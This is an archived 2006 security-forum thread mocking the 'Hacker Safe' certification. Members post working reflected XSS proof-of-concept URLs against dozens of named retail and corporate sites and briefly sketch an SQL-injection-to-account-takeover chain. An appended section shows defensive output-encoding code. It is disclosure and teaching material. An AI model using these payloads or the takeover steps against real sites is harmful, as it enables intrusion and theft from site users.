Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Current Page: 1 of 3
Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:12AM

Yup. Hackers are perfectly safe at those sites. ;)

http://www.ex24.com/glo_marketwatch.jsp?symb=%22%3E%3Cscript%3Ealert('hacker%20safe!')%3C/script%3E

- Kyran

Re: Hacker safe!
Posted by: thomaspollet
Date: November 09, 2006 10:18AM

from fd thread :

http://www.tritonhealth.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.usenext.com/UseNextDE/ShopInt/misc/miscShowNewsgroups.cfm?SNUUID=CC8A8130-E00E-2063-874892F19C7A185D&1163072824024%22%3E%3Cscript%3Ealert(1)%3C/script%3E&

Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:27AM

http://cpwstore.carpartswholesale.com/year_model.php?make_text=Acura&year=1986%3C/title%3E%3Cscript%3Ealert('xss')%3C/script%3E&x=37&y=10

- Kyran

Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:41AM

http://www.shopperschoice.com/index.html?sstring=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&a-filterDeptPost=0&action=search&x=0&y=0

- Kyran

Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:49AM

http://www.lifesourcewater.com/search.html?search=%3Cscript%3Ealert(1337);%3C/script%3E

- Kyran

Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 10:59AM

Jumped out of javascript.
http://www.nativeremedies.com/hbx-searchscript.php?query=%22%3B%3C%2Fscript%3Exss%3Cscript%3Ealert(1337)%3C/script%3E&SEARCH=Go&index=407607&calln=2&lastq=%2B%5C%2522%3E%3Cxss%3E&opt=ALL

- Kyran

Re: Hacker safe!
Posted by: Kyran
Date: November 09, 2006 11:08AM

http://search.hardwarestore.com/?query=%3C/title%3E%22%3B%3C%2Fscript%3E%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0

http://www.maxwigs.com/index.php?search_in=all&p=catalog&mode=search&search_str=%22+%2F%3Exss%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&searchsubmit.x=0&searchsubmit.y=0

- Kyran

Re: Hacker safe!
Posted by: rsnake
Date: November 09, 2006 11:29AM

I don't see the problem here. Clearly ScanAlert feels that XSS isn't a problem. I love the text on their page:

Quote



This site is tested and certified daily to pass the FBI/SANS Internet Security Test. The "live" HACKER SAFE mark appears only when a web site's security meets the highest security scanning standards of the U.S. government, Visa, MasterCard, American Express, Discover and JCB.

Sites free of all known vulnerabilities that can be remotely scanned for, such as those earning HACKER SAFE certification, prevent over 99.99% of hacker crime.

This information is intended as a relative indication of the security efforts of this web site and its operators. While this, or any other, vulnerability testing cannot and does not guarantee security; it does show that www.hardwarestore.com meets all payment card industry guidelines for remote web server vulnerability testing to help protect your personal information from hackers. HACKER SAFE does not mean hacker proof. HACKER SAFE certification cannot and does not protect any of your data that may be shared with other servers that are not certified HACKER SAFE, such as credit card processing networks or offline data storage, nor does it protect you from other ways your data may be illegally obtained such as non-hacker "insider" access to it. While ScanAlert makes reasonable efforts to assure its certification service is functioning properly, ScanAlert makes no warranty or claim of any kind, whatsoever, about the accuracy or usefulness of any information provided herein. By using this information you agree that ScanAlert shall be held harmless in any event.


That last part is great. We don't promise anything. I guess the "highest standard" of security needs some work.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: jungsonn
Date: November 09, 2006 12:35PM

if not safe. = it's not safe.

how can one promise 99% if that 1% is an open window and stay credible?
Why not scan for that also?

A few sites had SQL holes in it, whereby one could obtain access to all the users.
What is that 99%? i think all sites are close to 99% "hack0R safe" then.

Seems just a bubble, a false sense of security.

Re: Hacker safe!
Posted by: jungsonn
Date: November 09, 2006 12:43PM

Like:

inject sql -> steal users from a db -> go to their email -> try to login -> collect all sensitive info

Yep safe.



Edited 1 time(s). Last edit at 11/18/2006 11:42AM by jungsonn.

Re: Hacker safe!
Posted by: rsnake
Date: November 09, 2006 01:02PM

A lot of times it's easier than the "browse for creditcard data in emails" part. Just look for emails from sites they have accessed in the past and use the forgot password function to gain access to those accounts.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 12:59AM

Yes,

Just like a common mistake in cryptography people tend to make, there is no 99%, not even 10% security. or 1%. If it is 99% secure, and the weak link is the 1%, that 1% means that the whole chain/system is 1% secure basically, because it failed/compromised the 99%. And could even weaken a system, anyone determined enough and with the tools can access any system.

But my biggest argument against labeling those sites "hacker safe", is that its users may think: oh it's safe, i can go ruthless about now. Not considering, that in this digital world there are only weak links in the chain.

Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 04:42AM

Some first HACKER SAFE© finds from "so it begins" thread:

Maluc:
http://www.hackersafe.com/error/msg.jsp?msg=Haxxored

Jungsonn:

Send them a mail with a click:
http://www.hackersafe.com/site/en/merchants/moreinfo/?send=Y&interest=technology

Yay!, it sure does help such hacker safe logo.
http://www.dvdempire.com/Exec/v5_search_item.asp?userid=99365065948345&string=%22%3E%3Cscript%3Ealert%28%27hacker+safe%21%27%29%3B%3C%2Fscript%3E%3C%22&site_media_id=&site_id=4&pp=&used=0
http://www.goldnutritionstore.com/cgi-bin/category.cgi?query=%22%3E%3Cscript%3Ealert('H4cK0r%20Safe!!%20really,%20we%20truely%20are%20hacker%20safe,%20see%20the%20green%20logo.')%3C/script%3E%3C%22

Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 04:57AM

INFO:
http://www.scanalert.com/site/en/technology/howwescan/

Quote


Step3

Web application testing is the third phase of ScanAlert's daily security audit, and perhaps the most important. According to analyst firm Gartner Group, an estimated 70% of all security breaches today are due to vulnerabilities within the web application layer. Traditional security mechanisms such as firewalls and IDS' provide little or no protection against attacks on your web applications. During this testing phase, all HTTP services and virtual domains are checked for the existence of potentially dangerous modules, configurations settings, CGIs and other scripts, and default installed files. The web site is then "deep crawled," including flash embedded links and password protected pages, to find forms and other potentially dangerous "interactive elements." These are then exercised in specific ways to disclose any application-level vulnerabilities such as code revelation, cross-site scripting and SQL injection. Both generic and software specific tests are performed in order to uncover misconfigurations and coding error vulnerabilities.

This three phase approach to vulnerability auditing enables us to perform more accurate audits with less load on your servers. It also enables us to run any single test or test phase on a target to detect changes, test specific ports or vulnerabilities, or run web application only tests on multiple web sites residing on a single server.

So everything fails on step 3, my advice for clients of hacker safe: Demand your money back, and like RSnake said on his blog: let a specialist vouch for this kind of security/protection.

Re: Hacker safe!
Posted by: fogez
Date: November 10, 2006 11:16AM

http://www.lnt.com/registry/index.jsp?step=search&type=name&firstName=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&lastName=s

Re: Hacker safe!
Posted by: Kyran
Date: November 10, 2006 02:25PM

Okay. Time for some more high profile sites listed in the latest DR article. http://www.darkreading.com/document.asp?doc_id=110363&WT.svl=news1_1

http://www.gnc.com/search/noResults.jsp?kw=%3Cscript%3Ealert('Hacker%20safe?');%3C/script%3E

- Kyran

Re: Hacker safe!
Posted by: Kyran
Date: November 10, 2006 02:27PM

Had to break out of a comment for this one. http://www.jnj.com/search/search_results.htm?criteria=%20--%3E%20%3Cscript%3Ealert('xss')%3C/script%3E112&Find.x=40&Find.y=10

- Kyran

Re: Hacker safe!
Posted by: Kyran
Date: November 10, 2006 02:45PM

http://extsearch.worldbank.org/servlet/SiteSearchServlet?qUrl=&qSubc=wbg&ed=&q=%22%20onMouseover=%22alert('xss');&submit.x=19&submit.y=11

Move your mouse pretty much anywhere. It gets outputted in several places.

- Kyran

Re: Hacker safe!
Posted by: thomaspollet
Date: November 10, 2006 03:57PM

https://www.adorama.com/catalog.tpl?op=process&func=Login&xemail=%3Cscript%3Ealert('hack3r%20safe!')%3C/script%3E

Re: Hacker safe!
Posted by: WhiteAcid
Date: November 10, 2006 04:15PM

https://www.homesecuritystore.com/ezStore123/DTCheckOut1.asp?orderid=360071&customerid= << then insert any html tag as the first name and submit. I can't be arsed to make a PoC. My GM script can't do it as I think the form is created dynamically so it doesn't know the structure of the form.
http://estore.e-academy.com/index.cfm?loc=support/auto_support/main_support&parentID=17&type2ID=24&CFID=728729&CFTOKEN=3825%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://www.pictureline.com/navigation.php?cid=145%22%3E%3Cscript%3Ealert(1337)%3C/script%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.laptopbatteries.com/search.asp&search=<SCRIPT>alert(1337)</SCRIPT> << laptopbatteries.com
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.londonpass.com/search2.asp&search=<SCRIPT>alert('XSS')</SCRIPT>&search_button=&Form_Submited=1 << londonpass.com
http://www.homevisions.com/hvprod/SearchResultsdynamic.asp?searchfield=%22%0aalert('xss')//
http://www.homeannex.com/SearchI.asp?query=asdf--!%3E<script>alert('xss')</script>&imageField2.x=0&imageField2.y=0
http://www.buywirelessnow.com/utstarcom/do/search/searchProduct?search=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E&searchType=All+Words&searchField=Common+Search+Fields

This is not directly a flaw, but a very interesting error page: http://www.condomdepot.com/product/search.cfm?criteria=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&submit=Go

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 3 time(s). Last edit at 11/10/2006 04:25PM by WhiteAcid.

Re: Hacker safe!
Posted by: thomaspollet
Date: November 10, 2006 04:19PM

http://www.restorationhardware.com/rh/search/search_results.jsp?refineByValue=%3C/script%3E%3Cscript%3Ealert('b00')%3C/script%3EBath%3ABath+Hardware%3ATowel+Bars+%26+Tissue+Holders&link=refineby

Re: Hacker safe!
Posted by: maluc
Date: November 10, 2006 05:10PM

the damned forum won't let me link this without encoding.
so copy/paste yourself

http://www.nike.com/nikewomen/index.jsp?X';}alert('XSS');if(1==1){x='x

-maluc



Edited 1 time(s). Last edit at 11/10/2006 05:11PM by maluc.

Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 06:18PM

*in quote mode now*

Quote

Daniel Patterson, lead Webmaster for Shoppers Choice, says his company has since corrected the XSS vulnerability on its site and will be looking for other potential bugs. "It was surprising -- we thought we had fixed the problem a while back," Patterson says. "It is also surprising that Hacker Safe apparently had not notified us of a seemingly popular method for XSS."

Yeah right, better give the money you spend @ hackersafe to a good web developer I'd say.

Wow:

Quote

ScanAlert has some big-name Hacker Safe customers: A&E Television Networks, Ace Hardware, American Red Cross, Fidelity National Financial, General Nutrition Centers, HP, Johnson & Johnson, NIKE, Northrop Grumman, PETCO, Ritz Camera, Sony, The Sports Authority, The World Bank, U-Haul, Visa, Warner Brothers, and Yahoo. None of these companies were found to have vulnerabilities by sla.ckers.org.

Game on?

Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 06:33PM

Quote

"We are all just doing this on the side," says "Kyran," a member of Sla.ckers group. "There is no targeted or unified effort. Rather scary isn't it? A small group of people doing this in their spare time, finding so many XSS vulns. It really makes you wonder what the real bad guys are doing."

I do it while i sleep, just tapping some keys now and then, no rocket science. and sometimes i hire 13 monkeys to do the "hard XSS stuff", 'cuzz i'm lazy.

Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 06:35PM

@maluc, what does that xss thingy do on NIKE? got a live example?

Re: Hacker safe!
Posted by: rsnake
Date: November 10, 2006 06:45PM

Super funky that the forums don't allow you to enter straight tags. Sorry about that. But it's partly Nike's implementation where they don't change URL encoding to the ASCII equivalent. This is sort of a unique case. Cutting and pasting works:
Quote

www.nike.com/nikewomen/index.jsp?X';}alert('XSS');if(1==1){x='x

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: jungsonn
Date: November 10, 2006 07:09PM

Ghehe nice one! sla.ckers is back on the map again (if it ever was off it) ;)

Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 01:06AM

I don't recall it ever being off any map, but yes, we have some of the best web app sec minds in the industry watching and/or contributing. I'm pretty happy with the people we've got on this board, personally.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Hacker safe!
Posted by: jungsonn
Date: November 11, 2006 03:15AM

Yes there surely are, it was a mere joke to darkreading.com who said like: "None of these companies were found to have vulnerabilities by sla.ckers.org." seems that maluc already found 4 of the list, meh Yahoo doesn't count :]

btw RSnake, are there many lurkers on the board? i do notice however since i began to post here i get traffic on my business site from microsoft, google.com etc. all sleeping giants visiting poor little me, still nothing to be found on my site rather than being analysed, logged, profiled and stored ;)

Re: Hacker safe!
Posted by: rsnake
Date: November 11, 2006 03:21AM

It's difficult to tell for sure, but we definitely have about 50% lurkers on the board and a large amount above and beyond that haven't bothered to sign up for an account. The actual percentages are a little up in the air, but yes, there are way more people reading than posting.

- RSnake
Gotta love it. http://ha.ckers.org
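
The links posted in this thread break out of several different output contexts: a quoted attribute value, a title element, an inline script string, an HTML comment. As an added example that is not part of the original thread, the code below shows context-specific output encoding keeping those payload shapes inert. The helper names and the search page are hypothetical, and the sample inputs are constructed from the shapes posted above.

```javascript
// Added example, not code from the thread. Helper names are hypothetical.
// HTML text and quoted-attribute contexts: encode markup-significant characters.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// JavaScript string literal inside an inline <script>: escape every character
// except alphanumerics and space as \uXXXX, so a quote, a newline or
// "</script>" in the input cannot end the string or the script block.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// A search-results page that reflects the query in three contexts.
// HTML comments are deliberately not used: no encoding makes them safe.
function renderFragments(query) {
  return {
    title: '<title>Results for ' + encodeHtml(query) + '</title>',
    input: '<input name="q" value="' + encodeHtml(query) + '">',
    script: '<script>var lastQuery = "' + encodeJsString(query) + '";</script>'
  };
}

// True when each reflected value stayed inside its own context.
function staysInContext(query) {
  const f = renderFragments(query);
  return /^<title>[^<>]*<\/title>$/.test(f.title) &&
         /^<input name="q" value="[^"<>]*">$/.test(f.input) &&
         /^<script>var lastQuery = "[A-Za-z0-9 \\]*";<\/script>$/.test(f.script);
}

// Constructed inputs, modelled on the payload shapes posted in the thread.
const samples = [
  '"><script>alert(1)</script>',                 // attribute breakout
  "</title><script>alert('xss')</script>",       // title breakout
  '";</script>xss<script>alert(1337)</script>',  // script string breakout
  `" onMouseover="alert('xss');`,                // injected event handler
  "X';}alert('XSS');if(1==1){x='x",              // single-quoted JS string
  `"\nalert('xss')//`                            // newline inside a JS string
];

for (const q of samples) console.log(staysInContext(q), JSON.stringify(q));
```

The JavaScript encoder is lossless: the browser's parser turns the \uXXXX escapes back into the original characters, so the application still sees the exact query the user typed.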
